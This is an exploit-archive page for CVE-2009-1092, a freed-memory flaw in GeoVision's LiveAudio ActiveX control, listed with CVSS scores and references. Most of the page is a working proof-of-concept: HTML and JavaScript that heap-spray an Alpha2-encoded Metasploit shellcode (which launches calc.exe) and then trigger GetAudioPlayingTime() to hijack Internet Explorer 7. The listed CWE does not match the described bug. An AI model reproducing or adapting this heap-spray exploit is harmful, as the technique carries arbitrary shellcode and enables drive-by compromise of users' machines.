Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
GeoVision LiveAudio ActiveX Control GetAudioPlayingTime() remote freed-memory access
2009.03.28
Credit:
trotzkista
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2009-1092
CWE:
CWE-134
CVSS Base Score:
9.3/10
Impact Subscore:
10/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
Complete
Integrity impact:
Complete
Availability impact:
Complete
<!-- 02/03/2009 14.57.46 GeoVision LiveAudio ActiveX Control GetAudioPlayingTime() remote freed-memory access exploit (IE7) by Nine:Situations:Group::trotzkista vendor site: http://www.geovision.com.tw/ our site: http://retrogod.altervista.org/ details: CLSID: {814A3C52-B6F7-4AEA-A9BC-7849B9B0ECA8} Progid: LIVEAUDIO.LiveAudioCtrl.1 Binary Path: C:\WINDOWS\system32\LIVEAU~1.OCX File Version: 7.0 Implements IObjectSafety: False Safe For Initialization (Registry): True Safe For Scripting (Registry): True vulnerability: passing certain objects as parameter of GetAudioPlayingTime() method: .. (298.ed8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled eax=0174c258 ebx=0174c258 ecx=00020871 edx=00480018 esi=0273f5b4 edi=0000000d eip=43000000 esp=0273f58c ebp=0273f59c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202 43000000 ?? ??? this executes calc.exe, tested against windows xp sp3 with 256 Mb of ram ... worked all the times --> <html> <object classid='clsid:814A3C52-B6F7-4AEA-A9BC-7849B9B0ECA8' id='x'> </object> <div id='boom'></div> <script> // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" + "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" + "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" + "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" + "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" + "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" + "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" + "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" + "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" + "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" + "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" + "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" + "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" + "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" + "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" + "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" + "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" + "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" + "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" + "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" + "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" + "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" + "%u314e%u7475%u7038%u7765%u4370"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x41000) block = block+block+fillblock; memory = new Array(); for (i=0;i<0x800;i++){memory[i] = block+shellcode;if (i < 0x4b0) { memory[i-0x64] = "" }} try{eval('x.GetAudioPlayingTime(boom,boom)')}catch(e){} </script> original url: http://retrogod.altervista.org/9sg_geovision_liveaudio_freedmem.html
References:
http://xforce.iss.net/xforce/xfdb/49238
http://www.securityfocus.com/bid/34115
http://www.securityfocus.com/archive/1/archive/1/501773/100/0/threaded
http://www.milw0rm.com/exploits/8206
http://retrogod.altervista.org/9sg_geovision_liveaudio_freedmem.html
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top